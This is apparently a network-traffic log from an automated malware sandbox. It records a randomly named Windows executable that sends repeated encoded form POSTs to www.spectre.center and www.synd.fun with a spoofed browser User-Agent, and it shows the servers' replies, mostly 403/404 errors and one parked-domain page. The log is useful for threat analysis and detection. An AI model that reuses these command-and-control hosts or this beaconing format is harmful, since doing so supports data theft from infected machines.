                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 36 6c 50 4a 4c 43 50 3d 77 4f 39 78 58 30 41 4b 79 53 78 66 76 77 64 48 68 34 51 54 6c 52 56 30 72 35 62 79 4c 5a 79 41 46 71 57 39 66 63 72 63 53 74 48 68 46 5a 6f 4d 6b 47 71 7a 36 73 51 49 73 79 6b 46 74 5a 50 34 79 30 63 38 6a 4a 32 4f 74 6e 55 6e 4d 4f 37 7a 76 4f 36 61 32 63 37 34 4c 4f 79 67 67 41 34 39 43 4c 4b 42 6a 58 6e 46 35 52 55 52 56 2f 57 51 6f 68 38 50 55 58 43 33 31 52 63 45 50 4a 6d 2f 46 51 3d 3d 26 72 4a 6c 30 39 3d 31 5a 5a 38 4a 6c 6f 48 73 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x6lPJLCP=wO9xX0AKySxfvwdHh4QTlRV0r5byLZyAFqW9fcrcStHhFZoMkGqz6sQIsykFtZP4y0c8jJ2OtnUnMO7zvO6a2c74LOyggA49CLKBjXnF5RURV/WQoh8PUXC31RcEPJm/FQ==&rJl09=1ZZ8JloHsT"}</script></head></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            5192.168.2.5499895.39.10.93804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:31.085997105 CET810OUTPOST /v70f/ HTTP/1.1
                                                                                                                                                                            Host: www.spectre.center
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.spectre.center
                                                                                                                                                                            Referer: http://www.spectre.center/v70f/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 4d 44 6f 44 65 63 69 6d 4f 6c 37 71 59 78 65 43 38 65 67 77 61 43 41 63 45 66 64 57 30 38 4b 56 46 75 62 57 32 70 34 75 45 53 50 4e 63 72 76 56 31 75 6f 57 4d 4d 59 61 6e 41 6e 34 53 66 64 63 74 61 45 6a 47 62 5a 49 35 33 62 63 33 2b 38 71 61 34 74 34 66 44 70 58 35 50 59 70 6c 34 6a 42 68 31 79 51 4f 64 75 68 50 77 78 2b 66 69 67 79 46 44 31 79 4c 62 53 36 36 6a 46 64 2b 35 4d 49 54 47 45 78 34 6c 46 37 62 79 44 52 59 30 4e 79 2b 7a 2f 46 36 43 55 6d 45 67 6e 61 63 37 68 48 79 2b 46 53 75 58 58 41 64 62 46 66 72 4e 6e 30 35 76 2b 70 5a 6a 4d 4f 6f 32 50 58 5a 30 2f 30 44 63 32 4b 4f 61 73 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=MDoDecimOl7qYxeC8egwaCAcEfdW08KVFubW2p4uESPNcrvV1uoWMMYanAn4SfdctaEjGbZI53bc3+8qa4t4fDpX5PYpl4jBh1yQOduhPwx+figyFD1yLbS66jFd+5MITGEx4lF7byDRY0Ny+z/F6CUmEgnac7hHy+FSuXXAdbFfrNn05v+pZjMOo2PXZ0/0Dc2KOas=
                                                                                                                                                                            Dec 11, 2024 09:40:32.321997881 CET354INHTTP/1.1 403 Forbidden
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:32 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            6192.168.2.5499955.39.10.93804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:33.741982937 CET830OUTPOST /v70f/ HTTP/1.1
                                                                                                                                                                            Host: www.spectre.center
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.spectre.center
                                                                                                                                                                            Referer: http://www.spectre.center/v70f/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 4d 44 6f 44 65 63 69 6d 4f 6c 37 71 59 54 4b 43 2f 39 49 77 63 69 41 66 41 76 64 57 39 63 4c 39 46 75 6e 57 32 72 55 41 45 67 62 4e 63 4b 2f 56 30 71 38 57 50 4d 59 61 73 67 6e 68 63 2f 64 68 74 61 42 4a 47 65 35 49 35 33 66 63 33 38 6b 71 61 72 46 6e 65 54 70 52 79 76 59 72 76 59 6a 42 68 31 79 51 4f 63 4f 48 50 77 70 2b 65 54 51 79 45 68 64 39 42 37 53 39 79 44 46 64 31 5a 4d 45 54 47 45 70 34 6b 70 52 62 77 37 52 59 30 39 79 39 6d 4c 43 77 43 55 6b 4a 41 6d 78 54 70 67 4b 2f 75 34 64 6a 6c 47 63 4c 35 42 6e 6e 62 57 65 6a 4e 32 42 4b 44 67 32 34 6c 48 67 49 45 65 64 5a 2f 6d 36 51 4e 35 4d 57 4a 2b 59 66 38 55 4c 68 70 4e 64 36 52 36 75 45 37 34 2b
                                                                                                                                                                            Data Ascii: x6lPJLCP=MDoDecimOl7qYTKC/9IwciAfAvdW9cL9FunW2rUAEgbNcK/V0q8WPMYasgnhc/dhtaBJGe5I53fc38kqarFneTpRyvYrvYjBh1yQOcOHPwp+eTQyEhd9B7S9yDFd1ZMETGEp4kpRbw7RY09y9mLCwCUkJAmxTpgK/u4djlGcL5BnnbWejN2BKDg24lHgIEedZ/m6QN5MWJ+Yf8ULhpNd6R6uE74+
                                                                                                                                                                            Dec 11, 2024 09:40:34.968708992 CET354INHTTP/1.1 403 Forbidden
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:34 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            7192.168.2.5500015.39.10.93804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:36.396080017 CET1751OUTPOST /v70f/ HTTP/1.1
                                                                                                                                                                            Host: www.spectre.center
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.spectre.center
                                                                                                                                                                            Referer: http://www.spectre.center/v70f/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 4d 44 6f 44 65 63 69 6d 4f 6c 37 71 59 54 4b 43 2f 39 49 77 63 69 41 66 41 76 64 57 39 63 4c 39 46 75 6e 57 32 72 55 41 45 67 44 4e 62 34 6e 56 31 4e 41 57 4f 4d 59 61 6c 41 6e 6b 63 2f 64 77 74 62 6c 53 47 65 6b 33 35 31 58 63 33 5a 77 71 4e 4f 35 6e 58 54 70 52 39 50 59 71 6c 34 6a 55 68 31 6a 58 4f 64 69 48 50 77 70 2b 65 51 49 79 44 7a 31 39 48 37 53 36 36 6a 45 4a 2b 35 4d 6f 54 47 63 54 34 6b 64 72 63 42 62 52 59 55 74 79 2f 51 58 43 38 43 55 71 4b 41 6d 70 54 70 74 4b 2f 74 64 69 6a 6b 79 32 4c 37 52 6e 6a 36 72 47 36 38 2b 68 5a 52 30 79 6f 6c 4c 33 49 68 4f 50 62 74 69 50 51 76 70 64 55 62 57 7a 66 71 59 77 74 74 51 34 6e 33 71 35 4e 37 56 73 6c 34 67 4a 63 68 5a 67 63 41 4b 32 54 39 4e 4b 4b 72 41 52 73 67 35 65 4e 36 74 61 47 46 62 50 68 54 67 42 66 75 63 45 33 6b 62 73 53 76 68 47 51 4a 67 48 75 42 37 39 57 38 78 6c 62 6c 55 43 46 6c 51 45 39 54 31 56 48 54 48 6d 6e 59 53 6b 62 75 6f 6d 6c 48 6d 65 72 6d 47 78 4d 51 70 42 6f 37 41 6c 37 48 39 38 46 34 70 34 52 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=MDoDecimOl7qYTKC/9IwciAfAvdW9cL9FunW2rUAEgDNb4nV1NAWOMYalAnkc/dwtblSGek351Xc3ZwqNO5nXTpR9PYql4jUh1jXOdiHPwp+eQIyDz19H7S66jEJ+5MoTGcT4kdrcBbRYUty/QXC8CUqKAmpTptK/tdijky2L7Rnj6rG68+hZR0yolL3IhOPbtiPQvpdUbWzfqYwttQ4n3q5N7Vsl4gJchZgcAK2T9NKKrARsg5eN6taGFbPhTgBfucE3kbsSvhGQJgHuB79W8xlblUCFlQE9T1VHTHmnYSkbuomlHmermGxMQpBo7Al7H98F4p4RYaN3nzjE38993fH7VojQRsGyQkLyuxIgCV/OWdSFh6oiO97LOLXkeOTVOy4Ssvny0pKbKlRH2iA5mtlQIXeI6mKtyCEU5g5j2YmR11Q9U49PyOhTsbBIdITsWUm4DbAMNjOBahK9UVzRUxjrtbWmJY+FVLYYF4Sk5Cg4OLD35uOzSTji9qhh2xmL6yw7lWOkfQM1TT1bqSAkkFxe8e6UAPxVfixR6MDw7wxkrShpZ8lYgc9kXTIAd5erGGXzcDWSvTLVv2rpEYjsXsGJ4KyfECz3gPxnNc2ATFWDbwIbIZVFA+Fj5AqAZKy+xENUoC1HYYNPTGh54k8NIfqPwFZWvLrLqPKuKugJ9x1gnaxo6Sfae9GGnj8yAhx161GD3OTu9RYjQzTVwsat2vHDAO0LiIaXnt2CsUWxAFFhxIaliTN0uVIdVidaVbSe5I098wMElAWQWF7nxFFYEg3fn1jx8APITkNgchUAsKC0x3qqXNoljJ7AfvYSZPNoGg4luqADAdl0bvPvpPnvaBNX4ZG8q5PudryxYB9HRpo80ThrNF7lFBCb+wL+PDPjrz+odfmTw8CfjGTCLaMgbxKDVPc2CV13eIuZGO1hnR+ioVyrWUZktM9SMKWC1qPxOE3tDVQdPojHa9m7W8q2JPTQmJLqj2g0ijjf/AEqAO [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:40:37.656652927 CET354INHTTP/1.1 403 Forbidden
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:37 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
                                                                                                                                                                            Data Raw: 61 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 b1 0e c2 30 0c 44 77 24 fe c1 7c 40 14 10 8c 56 16 04 12 03 13 5f 90 62 d3 44 4a 9d ca 64 a0 7f 4f 0a ad 84 98 19 19 7d f7 ee 74 32 86 d2 25 b7 5c 60 60 4f 0e 4b 2c 89 dd 6e bd 85 63 d6 26 12 b1 a0 7d 8b 68 5f 48 45 9b 4c c3 18 b9 b2 14 56 87 61 f3 9d a8 0a da c9 1e bb 2b 34 5d d2 46 79 7c 7a 76 6e b3 f3 92 95 31 e0 a1 f7 44 51 5a 28 19 28 de 7d 93 18 ce 97 d3 01 bc 10 ec 83 e6 8e e1 a6 91 85 d2 00 ac 9a b5 26 5a 06 63 c6 65 ff 8a 5f fe e2 09 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                            Data Ascii: a90Dw$|@V_bDJdO}t2%\``OK,nc&}h_HELVa+4]Fy|zvn1DQZ((}&Zce_[0$0


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            8192.168.2.5500075.39.10.93804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:39.061841965 CET550OUTGET /v70f/?x6lPJLCP=BBAjdqWYBB/MRyq00dIcezl7OvIx5dSebduL9p4zICzjFNfvyshgEJ0+kFvLW81K0aQqDuxS3lz73s8YF+5iQllq44F7p5XcgmXLNN6nBjN0OyNZNCI3LIrenW8X1LlSCw==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.spectre.center
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:40:40.345693111 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:40 GMT
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Data Raw: 31 66 66 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 65 63 65 63 65 63 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 65 63 65 63 65 63 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9f d0 b0 d1 80 d0 ba d0 be d0 b2 d0 b0 20 d1 81 d1 82 d0 be d1 80 d1 96 d0 bd d0 ba d0 b0 20 49 6d 65 6e 61 2e 55 41 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e [TRUNCATED]
                                                                                                                                                                            Data Ascii: 1ffe2<!DOCTYPE html><html lang="ru-RU" prefix="og: http://ogp.me/ns#" class="no-js"><head> <meta name="theme-color" content="#ececec" /> <meta name="msapplication-navbutton-color" content="#ececec" /> <meta charset="UTF-8" /> <title> Imena.UA</title> <link rel="icon" type="image/png" href="//img.imena.ua/i/32.png" sizes="32x32"> <link rel="icon" type="image/png" href="//img.imena.ua/i/96.png" sizes="96x96"> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700,300&subset=latin,cyrillic" rel="stylesheet" type="text/css" /> <meta name="viewport" content="user-scalable=0, width=device-width, initial-scale=1" /> <link rel="stylesheet" href="https://img.imena.ua/css/media-set.css" type="text/css" /> <style> .park_domain_info { margin: 0 auto; max-width: 650px; text-align: center; } .park_domain_info p { font-size: 16px; padding-b [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:40:40.345740080 CET1236INData Raw: 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 33 37 37 61 61 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65
                                                                                                                                                                            Data Ascii: e { font-size: 30px; color: #0377aa; } </style></head><body> <div class="layout"> <div class="header_nav"> <header> <div class="reducer"> <div c
                                                                                                                                                                            Dec 11, 2024 09:40:40.345753908 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 64 75 63 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 76 5f 69 63 6f 6e 22 3e 3c 2f 64 69 76 3e 0a 20
                                                                                                                                                                            Data Ascii: <div class="reducer"> <div class="nav_icon"></div> <ul> <li class="first_nav_li mob_nav_3"> <div class="lang">
                                                                                                                                                                            Dec 11, 2024 09:40:40.345957994 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: </div> <div> <div class="radio left "> <div class="icon"></div>
                                                                                                                                                                            Dec 11, 2024 09:40:40.345973969 CET1236INData Raw: 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: </a> </div> </li> <li class="nav_phone" itemscope itemtype="http://schema.org/Organization"> <a href="tel:+380442010102">+380 (44) 201-01-0
                                                                                                                                                                            Dec 11, 2024 09:40:40.345988989 CET1236INData Raw: 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: </li> <li> <a href="https://www.imena.ua/domains/premium-domains" title=" "> </a>
                                                                                                                                                                            Dec 11, 2024 09:40:40.346280098 CET776INData Raw: 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6d 65 6e 61 2e 75 61 2f 68 65 6c 70 22 3e d0 94 d0 be d0 bf d0 be d0 bc d0 be d0 b3 d0 b0 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20
                                                                                                                                                                            Data Ascii: https://www.imena.ua/help"></a> </li> <li> <a href="https://www.imena.ua/contact"></a> </li>
                                                                                                                                                                            Dec 11, 2024 09:40:40.346295118 CET1236INData Raw: 23 22 20 63 6c 61 73 73 3d 22 65 6e 74 65 72 5f 62 74 6e 22 3e d0 92 d1 85 d1 96 d0 b4 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6e 74 65 72 5f 62 6c 6f 63 6b 20 68 69 64 64
                                                                                                                                                                            Data Ascii: #" class="enter_btn"></a> <div class="enter_block hidden"> <ol class="enter_block_black"> <li><a href="https://control.imena.ua/login.php?lang=2" rel="nofollow"><s
                                                                                                                                                                            Dec 11, 2024 09:40:40.346311092 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 61 6e 67 5f 6c 69 73 74 20 68 69 64 64 65 6e 22 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                            Data Ascii: </div> <div class="lang_list hidden"> <div class="lang_list_container"> <div> <div class="radio left ">
                                                                                                                                                                            Dec 11, 2024 09:40:40.346323013 CET1236INData Raw: 75 74 20 74 79 70 65 3d 22 72 61 64 69 6f 22 20 6e 61 6d 65 3d 22 68 5f 74 65 72 6d 22 20 76 61 6c 75 65 3d 22 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                            Data Ascii: ut type="radio" name="h_term" value="1"> <a href="https://www.imena.ua/ru" class="lang_ru"></a> </label> </div>
                                                                                                                                                                            Dec 11, 2024 09:40:40.465579987 CET1236INData Raw: 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 5f 73 65 61 72 63
                                                                                                                                                                            Data Ascii: v> </div> <div class="domain_search_bg_c"></div> <div class="domain_search_bg_triangle_l"></div> <div class="domain_search_bg_triangle_r"></div>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            9192.168.2.550029194.58.112.174804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:40:46.592794895 CET792OUTPOST /6sgf/ HTTP/1.1
                                                                                                                                                                            Host: www.synd.fun
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.synd.fun
                                                                                                                                                                            Referer: http://www.synd.fun/6sgf/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 33 67 75 70 4a 4a 6c 78 71 33 6e 69 65 75 77 4d 68 7a 47 37 58 45 64 39 70 51 35 36 32 59 55 4f 70 62 67 37 67 32 50 47 76 54 71 57 47 2b 59 48 68 45 4c 37 76 56 76 56 2b 4b 36 79 77 34 54 73 53 44 38 62 73 53 48 69 5a 49 34 66 53 77 76 54 76 30 54 77 62 74 48 2f 6d 63 47 68 62 39 71 33 79 65 59 57 6e 5a 53 55 59 62 49 72 48 35 38 6b 4c 32 53 44 6c 70 43 6c 41 42 6e 45 61 50 79 7a 38 4e 58 6d 34 6a 6f 36 38 49 49 4e 56 5a 4f 68 6c 43 30 4f 30 48 6e 59 5a 69 76 6e 4b 2b 4d 2b 32 45 66 74 6e 33 42 2f 71 38 46 38 44 47 6f 31 4e 75 65 79 64 7a 47 48 53 46 62 38 76 75 6c 45 6e 6e 6c 53 44 74 41 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=3gupJJlxq3nieuwMhzG7XEd9pQ562YUOpbg7g2PGvTqWG+YHhEL7vVvV+K6yw4TsSD8bsSHiZI4fSwvTv0TwbtH/mcGhb9q3yeYWnZSUYbIrH58kL2SDlpClABnEaPyz8NXm4jo68IINVZOhlC0O0HnYZivnK+M+2Eftn3B/q8F8DGo1NueydzGHSFb8vulEnnlSDtA=
                                                                                                                                                                            Dec 11, 2024 09:40:47.905786037 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                            Server: nginx
                                                                                                                                                                            Date: Wed, 11 Dec 2024 08:40:47 GMT
                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Encoding: gzip
